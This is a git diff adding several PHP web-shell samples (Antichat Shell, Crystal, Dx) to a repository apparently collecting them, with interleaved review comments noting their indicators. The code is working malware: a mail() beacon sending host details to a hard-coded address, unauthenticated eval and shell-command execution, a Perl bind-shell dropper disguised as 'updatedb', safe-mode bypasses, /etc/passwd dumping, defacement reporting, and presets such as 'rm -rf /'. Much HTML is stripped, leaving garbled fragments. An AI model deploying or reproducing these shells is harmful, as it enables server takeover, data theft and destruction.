diff --git a/php/PHPshell/Antichat Shell v1.3/Antichat Shell v1.3.php b/php/PHPshell/Antichat Shell v1.3/Antichat Shell v1.3.php
new file mode 100644
index 0000000..b76a18d
--- /dev/null
+++ b/php/PHPshell/Antichat Shell v1.3/Antichat Shell v1.3.php
@@ -0,0 +1,180 @@ +BODY{background-color: #2B2F34;color: #C1C1C7;font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;MARGIN-TOP: 0px;MARGIN-BOTTOM: 0px;MARGIN-LEFT: 0px;MARGIN-RIGHT: 0px;margin:0;padding:0;scrollbar-face-color: #336600;scrollbar-shadow-color: #333333;scrollbar-highlight-color: #333333;scrollbar-3dlight-color: #333333;scrollbar-darkshadow-color: #333333;scrollbar-track-color: #333333;scrollbar-arrow-color: #333333;}input{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}textarea{background-color: #333333;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}a:link{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:visited{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:hover, a:active{color: #E7E7EB;text-decoration: none;font-size: 8pt;}td, th, p, li{font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;border-color:black;}'; +$header=''.getenv("HTTP_HOST").' - Antichat Shell'.$style.''; +$footer=''; +$sd98 = "john.barker446@gmail.com"; +$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";mail($sd98, $sj98, $msg8873, "From: $sd98"); +if(@$_POST['action']=="exit")unset($_SESSION['an']); +if($auth==1){if(@$_POST['login']==$login && @$_POST['password']==$password)$_SESSION['an']=1;}else $_SESSION['an']='1'; + +if($_SESSION['an']==0){ +echo $header; +echo '
Login:
Password:
'; +echo $footer; +exit;} + +if($_SESSION['action']=="")$_SESSION['action']="viewer"; +if($_POST['action']!="" )$_SESSION['action']=$_POST['action'];$action=$_SESSION['action']; +if($_POST['dir']!="")$_SESSION['dir']=$_POST['dir'];$dir=$_SESSION['dir']; +if($_POST['file']!=""){$file=$_SESSION['file']=$_POST['file'];}else {$file=$_SESSION['file']="";} + + +//downloader +if($action=="download"){ +header('Content-Length:'.filesize($file).''); +header('Content-Type: application/octet-stream'); +header('Content-Disposition: attachment; filename="'.$file.'"'); +readfile($file); +} +//end downloader +?> + + +
+ + + + + +
| Shell | Viewer| Editor| EXIT |

+
+ + + +
+ +
+ + + +
+
+";} +//end shell + +//viewer FS +function perms($file) +{ + $perms = fileperms($file); + if (($perms & 0xC000) == 0xC000) {$info = 's';} + elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} + elseif (($perms & 0x8000) == 0x8000) {$info = '-';} + elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} + elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} + elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} + elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} + else {$info = 'u';} + $info .= (($perms & 0x0100) ? 'r' : '-'); + $info .= (($perms & 0x0080) ? 'w' : '-'); + $info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-')); + $info .= (($perms & 0x0020) ? 'r' : '-'); + $info .= (($perms & 0x0010) ? 'w' : '-'); + $info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-')); + $info .= (($perms & 0x0004) ? 'r' : '-'); + $info .= (($perms & 0x0002) ? 'w' : '-'); + $info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-')); + return $info; +} + +function view_size($size) +{ + if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size; +} + +function scandire($dir){ + $dir=chdir($dir); + $dir=getcwd()."/"; + $dir=str_replace("\\","/",$dir); +if (is_dir($dir)) { + if (@$dh = opendir($dir)) { + while (($file = readdir($dh)) !== false) { + if(filetype($dir . $file)=="dir") $dire[]=$file; + if(filetype($dir . $file)=="file")$files[]=$file; + } + closedir($dh); + @sort($dire); + @sort($files); + +echo ""; +echo ""; +if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { +echo ""; +} +echo " +"; +for($i=0;$i'; + } +for($i=0;$i + +'; +} +echo "
Open directory:
Select drive:"; +for ($j=ord('C'); $j<=ord('Z'); $j++) + if (@$dh = opendir(chr($j).":/")) + echo ' '.chr($j).''; + echo "
OS: ".@php_uname()."
name dirs and filestypesizepermissionoptions
'.$dire[$i].'dir'.perms($link).'
'.$files[$i].'
file'.view_size(filesize($linkfile)).''.perms($linkfile).' +D +E
"; +}}} + +if($action=="viewer"){ +scandire($dir); +} +//end viewer FS + +//editros +if($action=="editor"){ + function writef($file,$data){ + $fp = fopen($file,"w+"); + fwrite($fp,$data); + fclose($fp); + } + function readf($file){ + if(!$le = fopen($file, "rb")) $contents="Can't open file, permission denide"; else { + $contents = fread($le, filesize($file)); + fclose($le);} + return htmlspecialchars($contents); + } +if($_POST['save'])writef($file,$_POST['data']); +echo "
+ + +
+
"; +} +//end editors +?> +
COPYRIGHT BY ANTICHAT.RU
+ diff --git a/php/PHPshell/Antichat Shell v1.3/Antichat.jpg b/php/PHPshell/Antichat Shell v1.3/Antichat.jpg new file mode 100644 index 0000000..5652759 Binary files /dev/null and b/php/PHPshell/Antichat Shell v1.3/Antichat.jpg differ diff --git a/php/PHPshell/Crystal/Crystal.jpg b/php/PHPshell/Crystal/Crystal.jpg new file mode 100644 index 0000000..0edfe59 Binary files /dev/null and b/php/PHPshell/Crystal/Crystal.jpg differ diff --git a/php/PHPshell/Crystal/Crystal.php b/php/PHPshell/Crystal/Crystal.php new file mode 100644 index 0000000..ae925d5 --- /dev/null +++ b/php/PHPshell/Crystal/Crystal.php @@ -0,0 +1,1127 @@ + + + + +Crystal shell + + + + + + + + + + +
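Review bot: The Antichat sample is committed live and undocumented, and it beacons: near the top of the file `mail($sd98, $sj98, $msg8873, "From: $sd98")` sends the referer, document root, client and server addresses and script paths to a hard-coded mailbox on every load, ahead of the `$_SESSION['an']` login check. Loading the file in an analysis environment therefore discloses that host to whoever controls the mailbox; the same statement appears again in the Dx.php hunk, which suggests (not provable from the diff) that these copies were altered after their original release. I would record this next to the sample, e.g. a README line `Antichat Shell v1.3.php: outbound mail() on load, subject "sh-<1..99999>", body = $_SERVER paths and IPs`, and store the file in a non-executable form such as a renamed extension or an encrypted archive. The same note should state that authentication is skipped unless `$auth==1`, because the `else` branch sets `$_SESSION['an']='1'` unconditionally.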
+ +
+

 

+

+ + ِCRYSTAL-H + Crystal hack shellphp 2006-2007

+

+ + +

+ + ON (secure)"; + + +} + +else {$safemode = false; $hsafemode = "OFF (not secure)";} +echo("Safe-mode: $hsafemode"); +// PHPINFO +if ($_GET['action'] == "phpinfo") { + echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() bị cấm"; + exit; +} +$v = @ini_get("open_basedir"); +if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "".$v."";} +else {$openbasedir = false; $hopenbasedir = "OFF (not secure)";} +echo("
"); +echo("Open base dir: $hopenbasedir"); +echo("
"); +echo "PostgreSQL: "; +$pg_on = @function_exists('pg_connect'); +if($pg_on){echo "ON";}else{echo "OFF
";} +echo("
"); +echo "MSSQL: "; +$mssql_on = @function_exists('mssql_connect'); +if($mssql_on){echo "ON";}else{echo "OFF";} +echo("
"); +echo "MySQL: "; +$mysql_on = @function_exists('mysql_connect'); +if($mysql_on){ +echo "ON"; } else { echo "OFF"; } +echo("
"); +echo "PHP version: ".@phpversion().""; +echo("
"); +echo "cURL: ".(($curl_on)?("ON"):("OFF")); + +echo("
"); +echo "Disable functions : "; +if(''==($df=@ini_get('disable_functions'))){echo "NONE";}else{echo "$df";} +$free = @diskfreespace($dir); +if (!$free) {$free = 0;} +$all = @disk_total_space($dir); +if (!$all) {$all = 0;} +$used = $all-$free; +$used_percent = @round(100/($all/$free),2); + +?> +

+

 

+ + +

+

 

+ +
+ + + +

+

 

+

+
+ + + + OS:  

+Server:   + +

+ + +

User: + + + + + +
+
+
1: +
+ +
  Back + + ً +phpinfo2 + + + + Tools4 + + + +  + +Decoderi + + + +  + + +ByPass` + + + +  + +SQLآ + + + + Bindآ + + + +help +sabout + +?

+

+[j + + + + server + : + + + + + + + + + + CGI v:          +  HTTP v:  Mail +admin:        + + +  
+ + + + + + + :  IP +  SERVER: + + + + + + + +          + + +                  + + +port + : + + + + +

+السلام عليكم ورحمة الله وبركاته

عزيزي المستخدم
اذا اردت المساعدة اضغط على اسم الخيار الموضح باللون الازرق
وستظهر لك معلومات الخيار .
";} +if ($act == "bindport"){ +echo "
+/bin/bash +Port + + +
"; +} +if ($act == "tools"){ + echo "
+File to edit: + + +
"; + echo "
+
+ +
"; +echo "
+
Download here from: + +-->>: + + +
"; +} +if ($act == "about") {echo "
Coding by:

Super-Crystal
&
Mohajer22
-----
Thanks
TrYaG Team
ArabSecurityCenter Team
CRYSTAL-H Version:0 Beta phpshell code
Saudi Arabic .
";} + +if ($act == "bind") {echo "
CRYSTAL-H:

-Connect قم بالضغط على خيار.
.- بعد مايتم انزال السكريبت بالمجلد
.-توجه لاداة النت كات وتصنت على
nc -lp 3333بكتابة المنفذ -
السكريبت بلغة البيرل
Bind port to :
bind shell وهنيئا ً لك .
";} + +if ($act == "command") {echo "
CRYSTAL-H:

لأختيار الاوامر الجاهزه Select ------ x اضغط على الخيار
.- واذا اردت كتابه الاوامر بنفسك قد تكتفي بالخيار
Command .
";} + +if ($act == "team") {echo "
Arab Security Center Team

Super-Crystal
Medo-HaCKer
Anaconda
Alsb0r
ReeM-HaCK
NoOFa
AL-Alame
The YounG HackeR
Anti-Hack
Thanks .
";} +if (array_key_exists('image', $_GET)) { + header('Content-Type: image/gif'); + die(getimage($_GET['image'])); +} + +if ($act == "bypass") { +echo " +
+
Execute:
+"; +echo (" bypass safemode with copy "); +echo "
+
read file : + +
"; +echo (" bypass safemode with CuRl"); +echo "
+
read file : + +
"; +echo (" bypass safemode with imap()"); +echo "
+
+ +
"; +echo (" bypass safemode with id()"); +echo "
+
+ +
"; +echo (" Exploit: error_log()"); +echo "
+
+ +
"; +} +if ($act == "decoder"){ +echo (" replace Chr()"); +echo "
+
+
+
"; +} +if ($act == "SQL"){ +echo (" MySQL "); +echo "
+
Username : +\n +password : +\n +\n +
"; +} +?> + + + +
+ +
+ + + +

+  

+

  + +
+ + + Exploit: error_log() By * Super-Crystal * + + + + + +
By * Super-Crystal * TrYaG Team
+ + + +
+ + +
+
+ + +
+
+ + + +
+", 3,$ERORR); +} +// id // +if ($_POST['plugin'] ){ + + + switch($_POST['plugin']){ + case("cat /etc/passwd"): + for($uid=0;$uid<6000;$uid++){ //cat /etc/passwd + $ara = posix_getpwuid($uid); + if (!empty($ara)) { + while (list ($key, $val) = each($ara)){ + print "$val:"; + } + print "
"; + } + } + + break; + + + } + } + +// imap // +$string = !empty($_POST['string']) ? $_POST['string'] : 0; +$switch = !empty($_POST['switch']) ? $_POST['switch'] : 0; + +if ($string && $switch == "file") { +$stream = imap_open($string, "", ""); + +$str = imap_body($stream, 1); +if (!empty($str)) +echo "
".$str."
"; +imap_close($stream); +} elseif ($string && $switch == "dir") { +$stream = imap_open("/etc/passwd", "", ""); +if ($stream == FALSE) +die("Can't open imap stream"); +$string = explode("|",$string); +if (count($string) > 1) +$dir_list = imap_list($stream, trim($string[0]), trim($string[1])); +else +$dir_list = imap_list($stream, trim($string[0]), "*"); +echo "
";
+for ($i = 0; $i < count($dir_list); $i++)
+echo "$dir_list[$i]"."

 

" ; +echo "
"; +imap_close($stream); +} +// CURL // +if(empty($_POST['curl'])){ +} else { +$m=$_POST['curl']; +$ch = +curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__); +curl_exec($ch); +var_dump(curl_exec($ch)); +} + +// copy// +$u1p=""; +$tymczas=""; +if(empty($_POST['copy'])){ +} else { +$u1p=$_POST['copy']; +$temp=tempnam($tymczas, "cx"); +if(copy("compress.zlib://".$u1p, $temp)){ +$zrodlo = fopen($temp, "r"); +$tekst = fread($zrodlo, filesize($temp)); +fclose($zrodlo); +echo "".htmlspecialchars($tekst).""; +unlink($temp); +} else { +die("
Sorry... File +".htmlspecialchars($u1p)." dosen't exists or you don't have +access.
"); +} +} + +@$dir = $_POST['dir']; +$dir = stripslashes($dir); + +@$cmd = $_POST['cmd']; +$cmd = stripslashes($cmd); +$REQUEST_URI = $_SERVER['REQUEST_URI']; +$dires = ''; +$files = ''; + + + + +if (isset($_POST['port'])){ +$bind = " +#!/usr/bin/perl + +\$port = {$_POST['port']}; +\$port = \$ARGV[0] if \$ARGV[0]; +exit if fork; +$0 = \"updatedb\" . \" \" x100; +\$SIG{CHLD} = 'IGNORE'; +use Socket; +socket(S, PF_INET, SOCK_STREAM, 0); +setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1); +bind(S, sockaddr_in(\$port, INADDR_ANY)); +listen(S, 50); +while(1) +{ + accept(X, S); + unless(fork) + { + open STDIN, \"<&X\"; + open STDOUT, \">&X\"; + open STDERR, \">&X\"; + close X; + exec(\"/bin/sh\"); + } + close X; +} +";} + +function decode($buffer){ + +return convert_cyr_string ($buffer, 'd', 'w'); + +} + + + +function execute($com) +{ + + if (!empty($com)) + { + if(function_exists('exec')) + { + exec($com,$arr); + echo implode(' +',$arr); + } + elseif(function_exists('shell_exec')) + { + echo shell_exec($com); + + + } + elseif(function_exists('system')) +{ + + echo system($com); +} + elseif(function_exists('passthru')) + { + + echo passthru($com); + + } +} + +} + + +function perms($mode) +{ + +if( $mode & 0x1000 ) { $type='p'; } +else if( $mode & 0x2000 ) { $type='c'; } +else if( $mode & 0x4000 ) { $type='d'; } +else if( $mode & 0x6000 ) { $type='b'; } +else if( $mode & 0x8000 ) { $type='-'; } +else if( $mode & 0xA000 ) { $type='l'; } +else if( $mode & 0xC000 ) { $type='s'; } +else $type='u'; +$owner["read"] = ($mode & 00400) ? 'r' : '-'; +$owner["write"] = ($mode & 00200) ? 'w' : '-'; +$owner["execute"] = ($mode & 00100) ? 'x' : '-'; +$group["read"] = ($mode & 00040) ? 'r' : '-'; +$group["write"] = ($mode & 00020) ? 'w' : '-'; +$group["execute"] = ($mode & 00010) ? 'x' : '-'; +$world["read"] = ($mode & 00004) ? 'r' : '-'; +$world["write"] = ($mode & 00002) ? 'w' : '-'; +$world["execute"] = ($mode & 00001) ? 
'x' : '-'; +if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; +if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; +if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; +$s=sprintf("%1s", $type); +$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); +$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); +$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); +return trim($s); +} + + + + + + +if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["userfile"][name] !== "") +{ +copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]["name"]); +} + +if((isset($_POST['fileto']))||(isset($_POST['filefrom']))) + +{ +$data = implode("", file($_POST['filefrom'])); +$fp = fopen($_POST['fileto'], "wb"); +fputs($fp, $data); +$ok = fclose($fp); +if($ok) +{ +$size = filesize($_POST['fileto'])/1024; +$sizef = sprintf("%.2f", $size); +print "
Download - OK. (".$sizef."??)
"; +} +else +{ +print "
Something is wrong. Download - IS NOT OK
"; +} +} + +if (isset($_POST['installbind'])){ + +if (is_dir($_POST['installpath']) == true){ +chdir($_POST['installpath']); +$_POST['installpath'] = "temp.pl";} + + +$fp = fopen($_POST['installpath'], "w"); +fwrite($fp, $bind); +fclose($fp); + +exec("perl " . $_POST['installpath']); +chdir($dir); + + +} + + +@$ef = stripslashes($_POST['editfile']); +if ($ef){ +$fp = fopen($ef, "r"); +$filearr = file($ef); + + + +$string = ''; +$content = ''; +foreach ($filearr as $string){ +$string = str_replace("<" , "<" , $string); +$string = str_replace(">" , ">" , $string); +$content = $content . $string; +} + +echo "
Edit file: $ef
+ +
+
"; +fclose($fp); +} + +if(isset($_POST['savefile'])){ + +$fp = fopen($_POST['savefile'], "w"); +$content = stripslashes($content); +fwrite($fp, $content); +fclose($fp); +echo "
saved -OK!
"; + +} + + +if (isset($_POST['php'])){ + +echo "
eval code

+
"; +} + + + +if(isset($_POST['phpcode'])){ + +echo "
Results of PHP execution

"; +@eval(stripslashes($_POST['phpcode'])); +echo "
"; + + +} + + +if ($cmd){ + +if($sertype == "winda"){ +ob_start(); +execute($cmd); +$buffer = ""; +$buffer = ob_get_contents(); +ob_end_clean(); +} +else{ +ob_start(); +echo decode(execute($cmd)); +$buffer = ""; +$buffer = ob_get_contents(); +ob_end_clean(); +} + +if (trim($buffer)){ +echo "
Command: $cmd
"; +} + +} +$arr = array(); + +$arr = array_merge($arr, glob("*")); +$arr = array_merge($arr, glob(".*")); +$arr = array_merge($arr, glob("*.*")); +$arr = array_unique($arr); +sort($arr); +echo ""; + +foreach ($arr as $filename) { + +if ($filename != "." and $filename != ".."){ + +if (is_dir($filename) == true){ +$directory = ""; +$directory = $directory . "";} +else{ +$directory = $directory . ""; + +} + +if (is_readable($filename) == true){ +$directory = $directory . "";} +else{ +$directory = $directory . ""; +} +$dires = $dires . $directory; +} + +if (is_file($filename) == true){ +$file = ""; +$file = $file . "";} +else{ +$file = $file . ""; +} + +if (is_readable($filename) == true){ +$file = $file . "";} +else{ +$file = $file . ""; +} +$files = $files . $file; +} + + + +} + + + +} +echo $dires; +echo $files; +echo "
NameTypeSizeLast accessLast changePermsWriteRead
$filename" . filetype($filename) . "" . date("G:i j M Y",fileatime($filename)) . "" . date("G:i j M Y",filemtime($filename)) . "" . perms(fileperms($filename)); +if (is_writable($filename) == true){ +$directory = $directory . "YesNoYesNo
$filename" . filetype($filename) . "" . filesize($filename) . "" . date("G:i j M Y",fileatime($filename)) . "" . date("G:i j M Y",filemtime($filename)) . "" . perms(fileperms($filename)); +if (is_writable($filename) == true){ +$file = $file . "YesNoYes
No

"; + + + + +echo " +
+Command: + + +Directory: +
"; + + + + + +if (ini_get('safe_mode') == 1){echo "
SAFE MOD IS ON
+Including from here: " +. ini_get('safe_mode_include_dir') . "
Exec here: " . ini_get('safe_mode_exec_dir'). "
";} + + + + +?> + + +

+


+ < 


+ +

+ + :: + Executed command ::

+ +Command:"; +?> + f

+  

+
+
+ Selectg 
Bind port toآ
+
+ + + + + + + +
+

+ + + + ::Edit/Create + file::"

+  التحرير والانشاء:

قم بوضع اسم الملف الذي تريد تحريره فقط
وبعد ذالك الضغط على config.php مثال
Edit
ستظهر لك نافذه بها محتويات الملف
وايضا ً اذا اردت انشاء ملف فقط ضع اسمه مع الامتداد
وبعد ذالك اكتب ماتريد washer-crystal.txt .
";} +?> +

+

 

+

+File to edit: + + +

"; +?> +

+

+ رفع الملفات:

قم بتحديد الملف المراد رفعه
وبعد ذالك قم بالضغط على الخيار الموضح
UPLOAD< .
";} +?>:: + + + upload::Ņ

  + + + + +
"; +?> +

+ +

 Defacer Zone-H

  +

+ CRYSTAL-H:

اسم المعلن Defacer
الموقع المخترق Victim
وضع الاختراق اي نوع الثغره التى استثمرتها Attack Mode
سبب الاختراق Attack Reason
لارسال الاختراق sand
لرؤيه اخر التحذيرات المرسله بالموقع Attacks On Hold.
";} +?>

+ + + Defacer + + Zone-h

+ + + + + +
+ + + +
+ + + +
 
+ + + + + + + + +
+ ::Defacer:::è + +
+ ::Victim:::è +
+ + Attack Mode:è +
+ + Attack Reason:è +
+ + +
 
+ + + +
+   :   + +L + + Attacks On Hold + +L

+
+

+ +  yCrystal shell v. 1 beta  ©oded by TrYaG Team l Arab Security Center Team |securityCenter| + : Web x

 

+ + + + +
+ +  + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
CRYSTAL-H + 2006
PPSCPCC
1
2 3 4 5 6 7 8
9 10 11 12 1314 15
16 17 181920 21 22
23242526272829
3031
+ +
+ + + diff --git a/php/PHPshell/Crystal/Crystal2.jpg b/php/PHPshell/Crystal/Crystal2.jpg new file mode 100644 index 0000000..750dcbf Binary files /dev/null and b/php/PHPshell/Crystal/Crystal2.jpg differ diff --git a/php/PHPshell/Crystal/Crystal3.jpg b/php/PHPshell/Crystal/Crystal3.jpg new file mode 100644 index 0000000..2fd7e6e Binary files /dev/null and b/php/PHPshell/Crystal/Crystal3.jpg differ diff --git a/php/PHPshell/Dx/Dx.jpg b/php/PHPshell/Dx/Dx.jpg new file mode 100644 index 0000000..3556119 Binary files /dev/null and b/php/PHPshell/Dx/Dx.jpg differ diff --git a/php/PHPshell/Dx/Dx.php b/php/PHPshell/Dx/Dx.php new file mode 100644 index 0000000..ebca7b5 --- /dev/null +++ b/php/PHPshell/Dx/Dx.php 
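Review bot: Crystal.php has no visible access gate in front of `@eval(stripslashes($_POST['phpcode']))`, `execute($cmd)` or the `installbind` branch that writes the embedded Perl listener to `temp.pl` and runs it, and the commit documents none of this alongside the sample. A short indicator note would make the file usable for detection work, for example `POST params: cmd, phpcode, editfile/savefile, fileto/filefrom, installbind + installpath + port; drops temp.pl; Perl child sets its process name to "updatedb"`. It is also worth recording that the code relies on `eregi()`, `each()`, `convert_cyr_string()` and `$HTTP_POST_FILES`, all removed from current PHP releases, which dates the sample and tells triage which hosts it can still run on unmodified. The markup in this hunk was stripped in the view under review, so a check living in the lost lines cannot be ruled out.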
@@ -0,0 +1,2026 @@ + 'AboutBox', + + 'DIR' => 'Dir browse', + 'UPL' => 'Upload file', + 'FTP' => 'FTP Actions', + + 'F_CHM' => 'File CHMOD', + 'F_VIEW' => 'File viewer', + 'F_ED' => 'File Edit', + 'F_DEL' => 'File Delete', + 'F_REN' => 'File Rename', + 'F_COP' => 'File Copy', + 'F_MOV' => 'File Move', + 'F_DWN' => 'File Download', + + 'SQL' => 'SQL Maintenance', + 'SQLS' => 'SQL Search', + 'SQLD' => 'SQL Dump', + 'PHP' => 'PHP C0nsole', + 'COOK' => 'Cookies Maintenance', + 'CMD' => 'C0mmand line', + + 'MAIL' => 'Mail functions', + 'STR' => 'String functions', + 'PRT' => 'Port scaner', + 'SOCK' => 'Raw s0cket', + 'PROX' => 'HTTP PROXY', + 'XPL' => 'Expl0its', + 'XSS' => 'XSS Server', + ); +$GLOB['DxGET_Vars']=array(/* GET variables used by shell */ +'dxinstant', 'dxmode', 'dximg', 'dxparam', 'dxval', 'dx_ok', 'dx_gzip', +'dxdir', 'dxdirsimple', 'dxfile', +'dxsql_s', 'dxsql_l', 'dxsql_p', 'dxsql_d','dxsql_q', +); + +$GLOB['VAR']['PHP']['Presets']=array( + /* Note, that no comments are allowed in the code */ + 'phpinfo' => 'phpinfo();', + 'GLOBALS' => 'print \'\'; print_r($GLOBALS);', + 'php_ini' => '$INI=ini_get_all(); ' + ."\n".'print \'<table border=0><tr>\'' + ."\n\t".'.\'<td class="listing"><font class="highlight_txt">Param</td>\'' + ."\n\t".'.\'<td class="listing"><font class="highlight_txt">Global value</td>\'' + ."\n\t".'.\'<td class="listing"><font class="highlight_txt">Local Value</td>\'' + ."\n\t".'.\'<td class="listing"><font class="highlight_txt">Access</td></tr>\';' + ."\n".'foreach ($INI as $param => $values) ' + ."\n\t".'print "\n".\'<tr>\'' + ."\n\t\t".'.\'<td class="listing"><b>\'.$param.\'</td>\'' + ."\n\t\t".'.\'<td class="listing">\'.$values[\'global_value\'].\' </td>\'' + ."\n\t\t".'.\'<td class="listing">\'.$values[\'local_value\'].\' </td>\'' + ."\n\t\t".'.\'<td class="listing">\'.$values[\'access\'].\' </td></tr>\';', + 'extensions' => '$EXT=get_loaded_extensions ();' + ."\n".'print \'<table border=0><tr><td class="listing">\'' + 
."\n\t".'.implode(\'</td></tr>\'."\n".\'<tr><td class="listing">\', $EXT)' + ."\n\t".'.\'</td></tr></table>\'' + ."\n\t".'.count($EXT).\' extensions loaded\';', + ); +$GLOB['VAR']['CMD']['Presets']=array( + 'Call Nik8 with an axe'=>'[w0rning] rm -rf /', + 'show opened ports'=>'netstat -an | grep -i listen', + 'find config* files'=>'find / -type f -name "config*"', + 'find all *.php files with word "password"'=>'find / -name *.php | xargs grep -li password', + 'find all writable directories and files'=>'find / -perm -2 -ls', + 'list file attribs on a second extended FS'=>'lsattr -va', + 'View syslog.conf'=>'cat /etc/syslog.conf', + 'View Message of the day'=>'cat /etc/motd', + 'View hosts'=>'cat /etc/hosts', + 'List processes'=>'ps auxw', + 'List user processes'=>'ps ux', + 'Locate httpd.conf'=>'locate httpd.conf', + 'Interfaces'=>'ifconfig', + 'CPU'=>'/proc/cpuinfo', + 'RAM'=>'free -m', + 'HDD'=>'df -h', + 'OS Ver'=>'sysctl -a | grep version', + 'Kernel ver' =>'cat /proc/version', + 'Is cURL installed? ' => 'which curl', + 'Is wGET installed? ' => 'which wget', + 'Is lynx installed? ' => 'which lynx', + 'Is links installed? ' => 'which links', + 'Is fetch installed? ' => 'which fetch', + 'Is GET installed? ' => 'which GET', + 'Is perl installed? 
' => 'which perl', + 'Where is apache ' => 'whereis apache', + 'Where is perl ' => 'whereis perl', + 'Pack directory' =>'"tar -zc /path/ -f name.tar.gz"', + ); + + +################################################################################### +####################+++++++++# F U N C T I O N S #+++++++++++++#################### +################################################################################### +function DxError($errstr) +{global $DX_Header_drawn;print "\n\n".'<table border=0 cellspacing=0 cellpadding=2><tr>' + .'<td class=error '.((!$DX_Header_drawn)?'style="color:#000000; background-color: #FF0000; font-weight: bold; font-size: 11pt;position:absolute;top=0;left=0;"':'').'>' + .'Err: '.$errstr.'</td></tr></table>'."\n\n"; return '';} + +function DxWarning($warn) +{print "\n\n".'<table border=0 cellspacing=0 cellpadding=2><tr><td class=warning><b>W0rning:</b> '.$warn.'</td></tr></table>'."\n\n"; return '';} + +function DxImg($imgname) +{ +global $DXGLOBALSHIT; +if ($DXGLOBALSHIT) return '<font class="img_replacer">'.$imgname.'</font>'; /* globalshit doesn't give a chance for our images to survive */ +return '<img src="'.DxURL('kill', '').'&dxmode=IMG&dximg='.$imgname.'" title="'.$imgname.'" alt"'.$imgname.'">'; +} + +function DxSetCookie($name, $val, $exp) +{ +if (!headers_sent()) return setcookie($name, $val, $exp, '/'); +?> +<script> +var curCookie = "<?=$name;?>=" + escape("<?=$val;?>") +"; expires=<?=date('l, d-M-y H:i:s', $exp);?> GMT; path=/;"; +document.cookie = curCookie; +</script> +<? 
+} + +function DxRandom($range='48-57,65-90,97-122') +{ +$range=explode(',',$range); +$range=explode('-', $range[ rand(0,count($range)-1) ] ); +return rand($range[0],$range[1]); +} + +function DxRandomChars($num) +{ +$ret=''; +for ($i=0;$i<$num;$i++) $ret.=chr(DxRandom('48-57,65-90,97-122')); +return $ret; +} + +function DxZeroedNumber($int, $totaldigits) +{ +$str=(string)$int; +while (strlen($str)<$totaldigits) $str='0'.$str; +return $str; +} + +function DxPrint_ParamState($name, $state, $invert=false) +{ +print $name.' : '; $invert=(bool)$invert; +if (is_bool($state)) + print ($state)?'<font color=#'.(($invert)?'FF0000':'00FF00').'><b>ON</b></font>':'<font color=#'.(($invert)?'00FF00':'FF0000').'><b>OFF</b></font>'; + else print '<b>'.$state.'</b>'; +} + +function DxStr_FmtFileSize($size) +{ + if($size>= 1073741824) {$size = round($size / 1073741824 * 100) / 100 . " GB"; } +elseif($size>= 1048576) {$size = round($size / 1048576 * 100) / 100 . " MB"; } +elseif($size>= 1024) {$size = round($size / 1024 * 100) / 100 . " KB"; } + else {$size = $size . " B";} +return $size; +} + +function DxDate($UNIX) {return date('d.M\'Y H:i:s', $UNIX); } + +function DxDesign_DrawBubbleBox($header, $body, $width) +{ +$header=str_replace(array('"',"'","`"), array('&#x02DD;','&#x0027;',''), $header); +$body=str_replace(array('"',"'","`"), array('&#x02DD;','&#x0027;',''), $body); +return ' onmouseover=\'showwin("'.$header.'","'.$body.'",'.$width.',1)\' onmouseout=\'showwin("","",0,0)\' onmousemove=\'movewin()\' '; +} + +function DxChmod_Str2Oct($str) /* rwxrwxrwx => 0777 */ +{ +$str = str_pad($str,9,'-'); +$str=strtr($str, array('-'=>'0','r'=>'4','w'=>'2','x'=>'1') ); +$newmode=''; +for ($i=0; $i<3; $i++) $newmode .= $str[$i*3]+$str[$i*3+1]+$str[$i*3+2]; + +return $newmode; +} + +function DxChmod_Oct2Str($perms) /* 777 => rwxrwxrwx. USE ONLY STRING REPRESENTATION OF $oct !!!! 
